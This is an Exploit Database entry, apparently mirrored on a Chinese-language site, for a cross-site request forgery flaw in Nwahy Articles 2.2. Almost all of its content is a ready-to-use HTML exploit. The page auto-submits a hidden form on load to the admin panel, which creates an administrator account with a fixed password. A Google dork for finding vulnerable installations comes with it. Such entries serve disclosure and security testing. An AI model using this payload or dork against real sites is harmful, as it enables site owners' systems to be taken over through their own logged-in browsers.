Nwahy Articles 2.2 – Cross-Site Request Forgery (Add Admin)

• Exploit Database
• 21 阅读

• 作者： DaOne
  日期： 2012-07-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/19927/

• ##########################################
  [~] Exploit Title: Nwahy Articles V2.2 CSRF Add Admin
  [~] Author: DaOne
  [~] Date: 18-7-2012
  [~] Category: webapps
  [~] Software Link: http://www.nwahy.com/upload/article-v2.2.rar
  [~] Google dork: intext:"Powered by Nwahy Articles V2.2"
  ##########################################
  
  [#] ~[ Exploit ]~
  
  <html>
  <body onload="document.form0.submit();">
  <form method="POST" name="form0" action="http://localhost/admincp/user.php?action=insert">
  <input type="hidden" name="username" value="webadmin"/>
  <input type="hidden" name="password" value="123456"/>
  <input type="hidden" name="email" value="admin@admin.com"/>
  <input type="hidden" name="site" value="http://www.nwahy.com"/>
  <input type="hidden" name="name" value="..."/>
  <input type="hidden" name="groubtype" value="1"/>
  </form>
  </body>
  </html>
  
  ##########################################